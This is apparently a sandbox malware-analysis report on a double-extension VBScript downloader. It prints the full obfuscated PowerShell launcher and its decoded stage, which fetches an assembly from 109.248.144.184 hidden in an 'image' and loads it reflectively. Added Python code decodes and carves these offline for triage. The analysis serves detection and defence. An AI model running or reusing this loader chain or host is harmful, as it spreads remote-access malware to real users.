Summary | ZeroBOX

greatdaysreturnbackdontworryforlovestoyou.gif.vbs

Signature tags: Generic Malware, Antivirus

Category:   FILE
Machine:    s1_win7_x6403_us
Started:    April 16, 2025, 11:06 a.m.
Completed:  April 16, 2025, 11:08 a.m.

Size:    242.8KB
Type:    UTF-8 Unicode text, with very long lines, with CRLF line terminators
MD5:     61e32df87e12055000045a25a185df34
SHA256:  ccbf292776fe7ea6fa9e21e97145db512b56c5eee0704bf1e553e800b742cf60
CRC32:   5D173C23
ssdeep:  192:U2B52bA2fAB82bA2wAB82yiN22CB52W22DA2S2W22f2BP2bA2nSBI2yr2ZSBH2b9:c4UiA9mOzqzeIM8lcosb7
Yara:    None matched

Process tree

  • wscript.exe (PID 1372)
    "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\greatdaysreturnbackdontworryforlovestoyou.gif.vbs
    The double extension is the lure: the name ends in .gif.vbs, and wscript.exe runs it as VBScript regardless of the .gif part.

    • powershell.exe (PID 2084), spawned by wscript.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bz#HQ#dQBu#HQ#aQBu#GU#cwBz#C##PQ#g#Cc#d#B4#HQ#LgBy#G8#ZgBl#HI#ZQBo#G4#bwBz#Gc#bgBp#Gg#d#B0#HM#ZQBi#HQ#ZQBn#HI#bwBm#GU#cgBo#HQ#ZQBn#G8#d#Bl#HY#bwBs#GU#cgBh#Gg#cwBl#Hc#LwBv#GM#YgBr#C8#c#Bw#G0#YQB4#C8#N##4#DE#Lg#0#DQ#MQ#u#Dg#N##y#C4#OQ#w#DE#Lw#v#Do#c#B0#HQ#a##n#Ds#J#By#GU#YwBv#Gw#b#Bp#GQ#aQBu#Gc#I##9#C##J#Bz#HQ#dQBu#HQ#aQBu#GU#cwBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bi#GU#YgBs#GE#cwB0#C##PQ#g#Cc#a#B0#HQ#c##6#C8#Lw#x#D##OQ#u#DI#N##4#C4#MQ#0#DQ#Lg#x#Dg#N##v#Hg#YQBt#H##c##v#HY#Yg#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Jw#7#CQ#Z#Bl#HM#YwB1#HI#YQBp#G4#aQBh#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#cgBh#GI#ZQBz#HE#dQBl#GQ#I##9#C##J#Bk#GU#cwBj#HU#cgBh#Gk#bgBp#GE#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#YgBl#GI#b#Bh#HM#d##p#Ds#J#B0#Hc#ZQBy#Gs#aQBu#Gc#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bh#HI#YQBi#GU#cwBx#HU#ZQBk#Ck#Ow#k#H##ZQBz#GM#YQBk#Gk#d#Bv#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#UwBU#EE#UgBU#D4#Pg#n#Ds#J#Bm#HU#cwBp#G8#bgBs#GU#cwBz#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#k#GY#bwBy#GU#ZgBl#G4#Z#Bp#G4#Zw#g#D0#I##k#HQ#dwBl#HI#awBp#G4#Zw#u#Ek#bgBk#GU#e#BP#GY#K##k#H##ZQBz#GM#YQBk#Gk#d#Bv#Ck#Ow#k#GM#cgBv#Hk#b#Bz#HQ#bwBu#GU#I##9#C##J#B0#Hc#ZQBy#Gs#aQBu#Gc#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bm#HU#cwBp#G8#bgBs#GU#cwBz#Ck#Ow#k#GY#bwBy#GU#ZgBl#G4#Z#Bp#G4#Zw#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GM#cgBv#Hk#b#Bz#HQ#bwBu#GU#I##t#Gc#d##g#CQ#ZgBv#HI#ZQBm#GU#bgBk#Gk#bgBn#Ds#J#Bm#G8#cgBl#GY#ZQBu#GQ#aQBu#Gc#I##r#D0#I##k#H##ZQBz#GM#YQBk#Gk#d#Bv#C4#T#Bl#G4#ZwB0#Gg#Ow#k#H##bwBv#Gw#a#Bv#HU#cwBl#HM#I##9#C##J#Bj#HI#bwB5#Gw#cwB0#G8#bgBl#C##LQ#g#CQ#ZgBv#HI#ZQBm#GU#bgBk#Gk#bgBn#Ds#J#Bz#G8#bQBl#HM#d#Bo#GU#cwBp#HM#I##9#C##J#B0#Hc#ZQBy#Gs#aQBu#Gc#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#ZgBv#HI#ZQBm#GU#bgBk#Gk#bgBn#Cw#I##k#H##bwBv#Gw#a#Bv#HU#cwBl#HM#KQ#7#CQ#cwBw#G8#cgBp#GM#aQBk#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bz#G8#bQBl#HM#d#Bo#GU#cwBp#HM#KQ#7#CQ#YwBv#G4#bgBp#HY#YQBu#GM#ZQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#HM#c#Bv#HI#aQBj#Gk#Z#Bl#HM#KQ#7#CQ#cgBp#G4#ZwBi#GU#YQBy#GU#cg#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#HI#ZQBj#G8#b#Bs#Gk#Z#Bp#G4#Zw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Mg#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
      The launcher's only obfuscation is a one-character substitution: every 'A' in a base64 string was replaced with '#'. Restoring the 'A's, base64-decoding and reading the bytes as UTF-16LE ([System.Text.Encoding]::Unicode) yields the second-stage script that Invoke-Expression runs; PowerShell echoes that script back in the WriteConsoleW error output further down this report.
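The launcher above can be unwrapped without running it. The following is an added example, not code from the ZeroBOX report or from the malware: it reproduces the Replace('#','A') / FromBase64String / Unicode.GetString pipeline offline and pulls the obvious indicators out of the recovered script. SAMPLE_SCRIPT is a shortened, constructed stand-in for the real second stage (same URL and marker strings, invented variable names); the real $Codigo from the command line above can be fed to decode_launcher() in place of the sample.

```python
"""Stage-1 deobfuscation of the PowerShell launcher in this report's process tree.

Added example (not from the ZeroBOX report or the malware). The launcher keeps
its real script as base64 of UTF-16LE text in which every 'A' was replaced by
'#'; at run time it calls $Codigo.Replace('#','A'), FromBase64String and
Encoding.Unicode.GetString, then Invoke-Expression. The functions below undo
that pipeline offline. SAMPLE_SCRIPT is a constructed stand-in for the real
second stage (same URL, same marker strings, invented variable names).
"""
import base64
import re
from typing import Dict, List, Union

# $var = '<blob>' ... .Replace('<swapped>','<original>')  (DOTALL: the blob can be very long)
LAUNCHER_RE = re.compile(r"\$(\w+)\s*=\s*'([^']+)'.*?\.Replace\('(.)',\s*'(.)'\)", re.DOTALL)


def decode_substituted_base64(blob: str, swapped: str = "#", original: str = "A") -> str:
    """Undo the one-character substitution, base64-decode, read as UTF-16LE."""
    restored = blob.replace(swapped, original)
    raw = base64.b64decode(restored, validate=True)  # validate=True: leftover junk is an error, not ignored
    return raw.decode("utf-16-le")


def decode_launcher(cmdline: str) -> str:
    """Locate the blob and the Replace() pair in a powershell command line and decode them."""
    m = LAUNCHER_RE.search(cmdline)
    if not m:
        raise ValueError("command line does not match the substituted-base64 launcher shape")
    _, blob, swapped, original = m.groups()
    return decode_substituted_base64(blob, swapped, original)


def extract_indicators(script: str) -> Dict[str, Union[bool, List[str]]]:
    """Cheap triage over the recovered script: URLs, carve markers, reflective load."""
    return {
        "urls": re.findall(r"https?://[^\s'\"]+", script),
        "markers": re.findall(r"<<[A-Z0-9_]+>>", script),
        "reflective_load": "[System.Reflection.Assembly]::Load" in script,
        "dnlib_vai": ".GetMethod('VAI')" in script,
    }


def encode_like_launcher(script: str, swapped: str = "#", original: str = "A") -> str:
    """Inverse of decode_substituted_base64; used only to build the constructed sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii").replace(original, swapped)


SAMPLE_SCRIPT = (
    "$u = 'http://109.248.144.184/xampp/vb/new_image.jpg';"
    "$t = [System.Text.Encoding]::UTF8.GetString((New-Object System.Net.WebClient).DownloadData($u));"
    "$s = $t.IndexOf('<<BASE64_START>>');$e = $t.IndexOf('<<BASE64_END>>');"
    "[System.Reflection.Assembly]::Load([System.Convert]::FromBase64String($t.Substring($s + 16, $e - $s - 16)));"
    "[dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @('', 'CasPol'))"
)
SAMPLE_CMDLINE = (
    'powershell.exe -NoProfile -Command "$Codigo = \'' + encode_like_launcher(SAMPLE_SCRIPT) + '\'; '
    "$OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); "
    'Invoke-Expression $OWjuxd"'
)

if __name__ == "__main__":
    recovered = decode_launcher(SAMPLE_CMDLINE)
    print(recovered)
    print(extract_indicators(recovered))
```

The swap character and its replacement are taken from the Replace() call rather than hard-coded, so the same function handles variants that swap a different letter; validate=True makes a wrong guess fail loudly instead of silently dropping characters.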

Network

Domains (Name / Response / Post-Analysis Lookup): no hosts contacted. The sample reaches its server by IP address only, so there is no DNS to pivot on.

IP Address        Status  Action
109.248.144.184   Active  Moloch

Suricata Alerts

Flow                                            SID      Signature                                                    Category
TCP 109.248.144.184:80 -> 192.168.56.103:49164  2047750  ET MALWARE Base64 Encoded MZ In Image                        A Network Trojan was detected
TCP 109.248.144.184:80 -> 192.168.56.103:49164  2049038  ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2   A Network Trojan was detected

Both alerts are on the server-to-client direction of the same flow, i.e. on the body of the downloaded "image", not on the request.

Suricata TLS

No Suricata TLS (the download is plain HTTP on port 80).

Time & API | Arguments | Status | Return | Repeated

GetComputerNameW   computer_name: TEST22-PC   1  1  0   (4 calls)
GetComputerNameA   computer_name: TEST22-PC   1  1  0   (1 call)
GetComputerNameW   computer_name: TEST22-PC   1  1  0   (2 calls)

IsDebuggerPresent  (no arguments)   0  0
Time & API | Arguments | Status | Return | Repeated

WriteConsoleW, 19 calls (console_handle 0x00000013 through 0x000000fb, each Status 1 / Return 1 / Repeated 0). Joined in order, the buffers are PowerShell's console output for the second-stage script:

True
Exception calling "Invoke" with "2" argument(s): "Could not load file or assembly 'System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' or one of its dependencies. The system cannot find the file specified."
At line:1 char:887
+ $stuntiness = 'txt.roferehnosgnihttsebtegroferhtegotevolerahsew/ocbk/ppmax/481.441.842.901//:ptth';$recolliding = $stuntiness -replace '#', 't';$beblast = 'http://109.248.144.184/xampp/vb/new_image.jpg';$descurainia = New-Object System.Net.WebClient;$arabesqued = $descurainia.DownloadData($beblast);$twerking = [System.Text.Encoding]::UTF8.GetString($arabesqued);$pescadito = '<<BASE64_START>>';$fusionless = '<<BASE64_END>>';$forefending = $twerking.IndexOf($pescadito);$croylstone = $twerking.IndexOf($fusionless);$forefending -ge 0 -and $croylstone -gt $forefending;$forefending += $pescadito.Length;$poolhouses = $croylstone - $forefending;$somesthesis = $twerking.Substring($forefending, $poolhouses);$sporicides = [System.Convert]::FromBase64String($somesthesis);$connivances = [System.Reflection.Assembly]::Load($sporicides);$ringbearer = [dnlib.IO.Home].GetMethod('VAI').Invoke <<<< ($null, [object[]] @($recolliding,'','','','CasPol',''
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : DotNetMethodTargetInvocation

What this output establishes:
- The echoed line is the decoded $Codigo payload. It downloads http://109.248.144.184/xampp/vb/new_image.jpg with System.Net.WebClient, treats the body as UTF-8 text, carves the text between the literal markers <<BASE64_START>> and <<BASE64_END>>, base64-decodes it, loads the result as a .NET assembly with [System.Reflection.Assembly]::Load, and calls the static method VAI on the type dnlib.IO.Home.
- The bare "True" is the value of the unassigned expression `$forefending -ge 0 -and $croylstone -gt $forefending`, so both markers were present in the downloaded body. The download, the carve and the Assembly.Load step all succeeded in the sandbox.
- The exception is raised by Invoke, not by Load: the loaded assembly references System, Version=4.0.0.0, which the sandbox's PowerShell host (running on a pre-4.0 CLR, the stock Windows 7 configuration) cannot resolve. The final stage therefore did not execute here, and whatever VAI does (child processes, injection, the C2 traffic a RAT would produce) is absent from this report for that reason. Re-run on a host with .NET 4.x before concluding anything from the missing behaviour.
- The first argument to VAI, $recolliding, is $stuntiness after a no-op (-replace '#', 't' on a string that contains no '#'). Read right to left it is http://109.248.144.184/xampp/kbco/wesharelovetogethreforgetbestthingsonherefor.txt, a second resource on the same host; the report shows no request for it, consistent with VAI never running. 'CasPol' is passed as the fifth argument; CasPol.exe is the .NET Code Access Security Policy tool.
- The captured console text ends at 'CasPol','' and the remaining arguments are not visible in this report.
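The carve-and-load step of the recovered script, done offline on raw bytes and followed by inspection instead of Assembly.Load. This is an added example, not code from the report or from the malware; the carrier bytes and the header-only PE it contains are constructed stand-ins, since the real new_image.jpg body is not on the page, and the marker strings are the ones the script uses.

```python
"""Stage-2 carving of the marker-delimited assembly from the 'image' carrier.

Added example (not from the ZeroBOX report or the malware). The recovered
script UTF-8-decodes the body of http://109.248.144.184/xampp/vb/new_image.jpg,
takes the text between the literal markers <<BASE64_START>> and
<<BASE64_END>>, base64-decodes it and hands the bytes to
[System.Reflection.Assembly]::Load. This reproduces the carve offline and
inspects the result instead of loading it. The carrier and the PE below are
constructed stand-ins; the real download is not on the page.
"""
import base64
import struct
from typing import Dict, Optional

START_MARKER = b"<<BASE64_START>>"
END_MARKER = b"<<BASE64_END>>"


def carve_between_markers(body: bytes, start: bytes = START_MARKER, end: bytes = END_MARKER) -> bytes:
    """Base64-decode whatever sits between the first START and the next END marker.

    Works on bytes rather than on a UTF-8-decoded string: the script's UTF8.GetString
    turns invalid image bytes into U+FFFD and shifts string indexes, but the markers
    and the base64 payload are pure ASCII, so searching the raw bytes is both safe
    and faithful to what the script ends up extracting.
    """
    s = body.find(start)
    if s < 0:
        raise ValueError("start marker not found")
    s += len(start)
    e = body.find(end, s)
    if e < 0:
        raise ValueError("end marker not found after start marker")
    return base64.b64decode(body[s:e].strip())


def pe_info(data: bytes) -> Dict[str, Optional[object]]:
    """Header-only PE inspection: MZ/PE signatures, machine type, and whether the
    CLR runtime data directory is populated (a .NET assembly, which is what
    Assembly.Load would have needed)."""
    info: Dict[str, Optional[object]] = {"is_pe": False, "is_dotnet": False, "machine": None}
    if len(data) < 0x40 or data[:2] != b"MZ":
        return info
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return info
    coff = e_lfanew + 4                      # IMAGE_FILE_HEADER (20 bytes)
    opt = coff + 20                          # IMAGE_OPTIONAL_HEADER
    if len(data) < opt + 2:
        return info
    info["is_pe"] = True
    info["machine"] = hex(struct.unpack_from("<H", data, coff)[0])
    magic = struct.unpack_from("<H", data, opt)[0]
    dirs = opt + (96 if magic == 0x10B else 112)  # data directories: PE32 at +96, PE32+ at +112
    if len(data) < dirs + 15 * 8:
        return info
    clr_rva, clr_size = struct.unpack_from("<II", data, dirs + 14 * 8)  # entry 14: CLR runtime header
    info["is_dotnet"] = clr_rva != 0 and clr_size != 0
    return info


def build_fake_dotnet_pe() -> bytes:
    """Constructed stand-in for the downloaded assembly: a header-only PE32 image
    with a populated CLR directory. It is not executable; it only exercises pe_info()."""
    dos = bytearray(0x40)
    dos[:4] = b"MZ\x90\x00"                  # e_magic + e_cblp as emitted by real linkers
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE header directly after the DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 0xE0, 0x2102)  # i386, 224-byte optional header
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)    # PE32 magic
    struct.pack_into("<II", opt, 96 + 14 * 8, 0x2008, 0x48)  # non-zero CLR header RVA/size
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


# Constructed carrier: a few JPEG-looking bytes, the markers around the base64 blob,
# then a JPEG end-of-image marker, mimicking an image with text appended to it.
FAKE_JPEG_PREFIX = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
SAMPLE_B64 = base64.b64encode(build_fake_dotnet_pe())
SAMPLE_BODY = FAKE_JPEG_PREFIX + START_MARKER + b"\r\n" + SAMPLE_B64 + b"\r\n" + END_MARKER + b"\xff\xd9"

if __name__ == "__main__":
    payload = carve_between_markers(SAMPLE_BODY)
    # Base64 that begins "TVqQ" is an 'MZ\x90\x00' header: a base64-encoded MZ inside
    # an image body, the pattern the ET rule in this report is named after.
    print("base64 prefix:", SAMPLE_B64[:4].decode())
    print("carved", len(payload), "bytes:", pe_info(payload))
```

In practice the body would come from a PCAP or a proxy log rather than be constructed; the carve is the same, and pe_info() is the point at which to stop and hand the bytes to a .NET decompiler rather than to the runtime.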
Time & API | Arguments | Status | Return | Repeated

CryptExportKey, 46 calls. Every call has the same shape: buffer <INVALID POINTER> (most likely a NULL pbData, i.e. a size query), flags 0, crypto_export_handle 0x00000000, blob_type 6 (PUBLICKEYBLOB), Status 1, Return 1, Repeated 0. Only the key handle varies; in call order:

crypto_handle   consecutive calls
0x007363a8      1
0x00736aa8      3
0x00736168      6
0x00736aa8      3
0x007367a8      3
0x00736be8      1
0x007367a8      7
0x00736ca8      14
0x00736d28      2
0x00736368      6
Time & API | Arguments | Status | Return | Repeated

GlobalMemoryStatusEx   (no arguments)   1  1  0

Network signatures

suspicious_features: GET method with no useragent header; Connection to IP address
suspicious_request:  GET http://109.248.144.184/xampp/vb/new_image.jpg
request:             GET http://109.248.144.184/xampp/vb/new_image.jpg

Both features follow directly from the recovered script: System.Net.WebClient sends no User-Agent unless one is set explicitly, and the URL is a raw IP address, which is why the domain table above is empty.
Time & API | Arguments | Status | Return | Repeated

NtAllocateVirtualMemory / NtProtectVirtualMemory: 50 calls, all with process_identifier 2084 (powershell.exe), process_handle 0xffffffff (the calling process itself), protection 64 (PAGE_EXECUTE_READWRITE), stack_dep_bypass 0, stack_pivoted 0, Status 1, Return 0, Repeated 0. Only the API, address, size, allocation type and the sandbox's heap_dep_bypass flag vary. In call order:

API                       base_address   size      allocation_type       heap_dep_bypass
NtAllocateVirtualMemory   0x02760000     1703936   8192 (MEM_RESERVE)    0
NtAllocateVirtualMemory   0x028c0000     4096      4096 (MEM_COMMIT)     1
NtProtectVirtualMemory    0x72fd1000     4096      (protection change)   0
NtAllocateVirtualMemory   0x0249a000     4096      4096 (MEM_COMMIT)     1
NtProtectVirtualMemory    0x72fd2000     8192      (protection change)   0

The remaining 45 calls are all NtAllocateVirtualMemory, 4096 (MEM_COMMIT), heap_dep_bypass 1, region_size 4096 (8192 for 0x028c2000), at these base addresses in order:
0x02492000, 0x024a2000, 0x028c1000, 0x028c2000, 0x024ca000, 0x024a3000, 0x024a4000, 0x0251b000, 0x02517000, 0x0249b000, 0x024c2000, 0x02515000, 0x024a5000, 0x024cc000, 0x02970000, 0x024a6000, 0x0251c000, 0x024c3000, 0x024c4000, 0x024c5000, 0x024c6000, 0x024c7000, 0x024c8000, 0x024c9000,
then 21 consecutive pages from 0x04e10000 through 0x04e24000.

Reading this section: powershell.exe is a .NET host, and page-sized PAGE_EXECUTE_READWRITE commits inside the process's own address space are what the CLR's JIT and loader produce on this generation of the runtime, so on their own they are not evidence of injected shellcode; heap_dep_bypass is the sandbox's heuristic on the protection value, not a detection of a DEP bypass. What would be evidence (a remote process_handle, NtWriteVirtualMemory/WriteProcessMemory, CreateRemoteThread, or a child process of powershell.exe) does not appear in this report, consistent with the VAI stage never executing (see the WriteConsoleW output).
Signature hits

file     C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
         (the literal, unexpanded %ProgramData% shows the script used a relative path, which resolved under the %TEMP% working directory of the .vbs)
cmdline  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = '…'; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
         (the full -Command string, elided here, is the one shown for PID 2084 in the process tree)
cmdline  powershell -NoProfile -Command "$Codigo = '…'; …; Invoke-Expression $OWjuxd"
         (same arguments, as wscript.exe passed them with the bare program name "powershell")
Time & API | Arguments | Status | Return | Repeated

ShellExecuteExW (the launch of powershell.exe shown in the process tree)
  show_type: 0 (SW_HIDE)
  filepath_r: powershell
  filepath: powershell   (bare name, resolved through the search path rather than an absolute path)
  parameters: -NoProfile -Command "$Codigo = '…'; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
              (the full string, elided here, is identical to the powershell.exe command line for PID 2084 in the process tree)
  1 1 0
Symantec ISB.Downloader!gen48
Avast Script:SNH-gen [Trj]
Kaspersky HEUR:Trojan.Script.Generic
Ikarus Trojan.VBS.RemcosRAT
Google Detected
Varist VBS/Agent.BYY
huorong HEUR:Trojan/VBS.Agent.y
Fortinet VBS/Agent.BYY!tr
AVG Script:SNH-gen [Trj]
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received ²H0÷ÉÛ);äÃf«HʤÝd"°WÙ$ïs“&A*ÆJöɓ™/&辜Y>®2n¥¬^üä„Uóy;äêrd€ä#ã'ß!É é€Œ™:õÀžù:àÃX„º8\ u¼{dS¶OËR:Œ•–-2dÉÓ™;äY1Iý°±qƒËR_ÆOLפНPÿ¸«÷95Ú3áú¯)\Žêlfvn7áÊqòfÛIx˜Ìlñ‹‹ “&L’wÆ`[’qFZQã"«®L'ÎÉ]Æ œ:dÉ&NÙ2ȓ|•ŠW÷É|cJ»d+틔 “&LŠ`ÃÛHrdpaÈMâƒ&L˜&ˆ`DìX í”t' b£Æ 1«fA'L˜²™/ç\„ØâÐ.¾ù2`P›8TYÁ’ë $sƒ&LŠvɓ&I2vɓ$0äɐ ™2fZKɓ&oL9$ɓ& 0Fù¢ictP«D ’X£“&C&£!ó—O³ÊB£œÏöÂI<’ ˜ÅHûàÉ'\0­ç#Öî:dƒ&L™$Á‡&HÊÕy3%ííÎ&]Š›÷wS’Tx4ra¢ÌkA0uÅ+w9÷ÆŠÈßQ¬ ï‡l=²Iƒ €äȬ’dɓv#Ë×&L…L™;å‰2dɒL™2d“&L™ÆónÝÇo¶.LŽâfˆc YŸf¡•ìñ¹í:”N t"À92Z¬™d›lÖU’Ù;dɊAÖ±Þ2€ߜAÁtÒ+ª×a”J‡\‚¯ã 9b jø€dë„|ÔU…ž2ÉdT‘Οr# +ºøö'¾Dˆ$«PöW>ÙÓÔgÙI¼½&NêÖIªÊjÍd*G0М–zd¿|;à€|$ƒÔa"†<1C|pJ€ã&Cõ’°)“ß&ɪXZÞIˆ2±QC.€Æ!mÊ7W3§ Z³&¦Ld`­ê[ظ²òdÂcÆH2aÂ+½ä‹“¾™ «9sKpî2œ™$Ó®¡uM¼]`í× úklRdè2q‡$ƒƒ“&AˆOŒœƒÇ&TY4‘;‹YŸ¶ä™º¢‰8G_¶ #‹ ƒ¶òC“'\±I߆˾pWÀZð1€£®‘‡®H+¹¡ùœ“–+ù`„êx'+qé»âãF@·íŽ-&7Ò?úl`¤zº‹À~»?ž‰ ‘ÉżѨ–9„Z#®QU‡ÓW m¼°Rƒx·åŒ€;O2W|‡$®L™*ò'ªPq:›ÈI<=1À+'^øxÅ c\dÆÛé»Á\^XƒŠÉM) pÉ Eõa°åÍUXG¦ðpuol‚X¾re³E墟q•ïˆ=rpà¼7ÇÆ);qƒ ã$ZøÈ87šÑb:F'—¿÷Ì´za‹E‰np0Õ •ÍwÉ'Ç+‹ÆÛéùK;d'+×ñÎI(d¾¸k!ëE¯l5ÇL |aüòZƒŒò‚¯Ï*ÎNMa[÷ăqۜ–[ÁÆWߥÇÛ©ÆÇ8e'ÏL•ìpdç¶I2_Æ2¡efºÞ(b…IÝkÁÂöMµ“—ÃòČ==òæ04 UNîÙ&8ÉTxÈ8㠐Ðí *îÜ/|JȲIV À+¾1kè+ß ¸uP ã×^•XyÁXAãbm (òp1éYï|RúcYÙWǶ{“Qã¾0ý²³Ë"Ýò lUr1³íÎCC%W^¸x£c³JªÌK Äjó(bð÷¼0$/Æ,äë„cšd¢Æ2µd«çrF f‡|”EÞJۄäó °HÄ<å€Òž1y¿l)ÒííŽö.vŽØË@=‹$PÄÚÕ`q…†r¢bÿOÛ%Ýs„û–#Q‡ 꾕ŠO&‡#‚xÀxÄQ‡¶ç" ¨ëÎO‚…ÖN}ÿLšºŠOŒ­´ŽãÛ¨›éŽ|ВD±€SŸ{ʔ_\¨ÊÆ¥ÃIÿsp ð}óDå k´®s=ä(ãÂæ97 ½Ô,bœŸÛ- Uz½ÆY¬s+š;{{å@~C”)cXжSæ¦î¦ò¦"Æ@ÄUb‘곍¢LcȾ>p¥lµ½ý5Û,ŒzMмª@/Ž=°ht'ó¤n²~Üd°""Ş¢°U£ïX÷G?H'ˆÝ÷Á¦`’Y䎞Øu ¹‹ç íÐïJGZ6z
Data received wAGc70BAAp6AnsJDAAEFP4BCwcsCwJzEAgACn0JDAAEAnsJDAAEAwRvEQgACisWH8kf8jKuKw4fih/VMrYrBh9pH8IwswAqPh/+c0wfAAYlAn0NDAAEKk4Ccz8IAAp9CAwABAIoYh8ABgAqkgIoBAAACgArCQIDfQoMAAQrBh9dH5Qw8QIo+AIACn0MDAAEKgAbMAIAPwAAADgAABECewoMAAQKKycGH/0uCCsABhcuAisMAN4HAihPHwAG3CsAAnwPDAAE/hU5AgAbKwYfLh/jMNMCH/59CgwABCoAARAAAAIAFwACGQAHAAAAABswAwD/AAAATgAAEQJ7CgwABAs4xgAAAAcsCCsABxcuBCsHKww4egAAABYK3dgAAAACFX0KDAAEOKwAAAAAAhZ9DgwABDiqAAAAAAICew0MAAR7CAwABG87CAAKfQ8MAAQCH/19CgwABCtRAgJ8DwwABCg8CAAKfRAMAAQAAgJ7DgwAB
Data sent GET /xampp/vb/new_image.jpg HTTP/1.1 Host: 109.248.144.184 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
host 109.248.144.184
Time & API Arguments Status Return Repeated

send

buffer: GET /xampp/vb/new_image.jpg HTTP/1.1 Host: 109.248.144.184 Connection: Keep-Alive
socket: 1420
sent: 87
1 87 0
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 